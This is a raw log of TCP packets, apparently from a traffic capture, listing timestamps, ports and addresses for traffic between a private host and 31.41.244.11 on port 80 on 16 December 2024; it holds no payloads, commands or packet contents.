Dec 16, 2024 11:03:22.273442030 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.273540020 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.273591042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.274606943 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.274657965 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.275695086 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.275760889 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.275832891 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.275868893 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.275885105 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.275913954 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.277009964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.277064085 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.277131081 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.277182102 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.278254986 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.278307915 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.278392076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.278441906 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.279284000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.279335976 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.279377937 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.279428005 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.280301094 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.280353069 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.280436039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.280487061 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.281436920 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.281490088 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.281558037 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.281609058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.282603025 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.282655954 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.282723904 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.282768965 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.283737898 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.283791065 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.283857107 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.283907890 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.284919024 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.284969091 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.284990072 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.285039902 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.286035061 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.286082983 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.286149979 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.286199093 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.287206888 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.287259102 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.287359953 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.287410975 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.288381100 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.288430929 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.288499117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.288549900 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.289501905 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.289555073 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.289587021 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.289660931 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.290664911 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.290714979 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.290781975 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.290833950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.291809082 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.291861057 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.292026997 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.292078972 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.292987108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.293037891 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.293067932 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.293118000 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.294152975 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.294207096 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.294224977 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.294275999 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.295294046 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.295344114 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.295428038 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.295480013 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.296443939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.296495914 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.296562910 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.296612978 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.297610044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.297662020 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.297743082 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.297796011 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.298851967 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.298887968 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.298907042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.298933983 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.299945116 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.299993992 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.300065041 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.300115108 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.301054955 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.301106930 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.301187992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.301234961 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.302222013 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.302274942 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.302342892 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.302393913 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.303689957 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.303747892 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.303750038 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.303802013 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.305406094 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.305449963 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.436084986 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.436158895 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.436170101 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.436218977 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.436827898 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.436853886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.436887026 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.436903000 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.437738895 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.437787056 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.438198090 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.438244104 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.438288927 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.438333035 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.439390898 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.439431906 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.439439058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.439476967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.440514088 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.440561056 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.440745115 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.440792084 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.441656113 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.441703081 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.441706896 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.441751003 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.442897081 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.442928076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.442945004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.442971945 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.444011927 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.444062948 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.444135904 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.444183111 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.445245981 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.445292950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.445339918 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.445385933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.446243048 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.446290970 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.446392059 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.446436882 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.447412014 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.447462082 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.447510958 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.447557926 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.448594093 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.448640108 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.448653936 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.448698997 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.449801922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.449852943 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.449906111 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.449951887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.450898886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.450946093 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.451049089 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.451093912 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.452065945 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.452115059 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.452156067 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.452203035 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.453238010 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.453289032 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.453296900 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.453342915 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.454371929 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.454408884 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.454416990 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.454447031 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.455507994 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.455554962 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.455708027 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.455753088 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.456655979 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.456702948 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.456856966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.456902981 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.457843065 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.457894087 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.457897902 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.457947969 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.458978891 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.459029913 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.459089041 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.459136009 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.460176945 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.460227966 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.460400105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.460452080 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.461308002 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.461359978 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.461442947 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.461493969 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.462466955 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.462517023 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.462723970 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.462774992 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.463730097 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.463781118 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.463856936 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.463907003 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.464895964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.464965105 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.464971066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.465014935 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.466048002 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.466099024 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.466176033 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.466226101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.467200041 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.467253923 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.467398882 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.467448950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.468240976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.468291998 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.468359947 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.468409061 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.469391108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.469440937 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.469499111 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.469547987 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.470583916 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.470633030 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.470676899 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.470726967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.471776962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.471828938 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.471911907 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.471961975 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.472981930 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.473032951 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.473179102 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.473238945 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.474073887 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.474126101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.474154949 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.474203110 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.475179911 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.475285053 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.475286961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.475337982 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.476377964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.476445913 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.476567030 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.476618052 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.477493048 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.477543116 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.477550030 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.477596045 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.478914976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.478969097 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.479017973 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.479068041 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.479890108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.479940891 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.479999065 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.480047941 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.481020927 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.481070042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.481077909 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.481127024 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.482103109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.482156992 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.482238054 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.482290030 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.483211994 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.483261108 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.483329058 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.483381987 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.484407902 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.484461069 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.484503031 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.484548092 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.485625029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.485661983 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.485677004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.485706091 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.486728907 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.486782074 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.486864090 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.486915112 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.487865925 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.487916946 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.487982988 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.488032103 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.489038944 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.489089966 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.489145041 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.489195108 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.490199089 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.490251064 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.490308046 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.490358114 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.491352081 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.491401911 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.491456985 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.491506100 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.492480993 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.492530107 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.492598057 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.492646933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.493673086 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.493725061 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.493771076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.493823051 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.494863987 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.494915009 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.494976044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.495024920 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.495948076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.495999098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.496045113 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.496098042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.628799915 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.628854990 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.628880024 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.628902912 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.629066944 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.629148960 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.629245996 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.629303932 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.630194902 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.630247116 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.630311012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.630362988 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.631381035 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.631436110 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.631438017 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.631480932 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.632565975 CET	80	49800	31.41.244.11	192.168.2.5
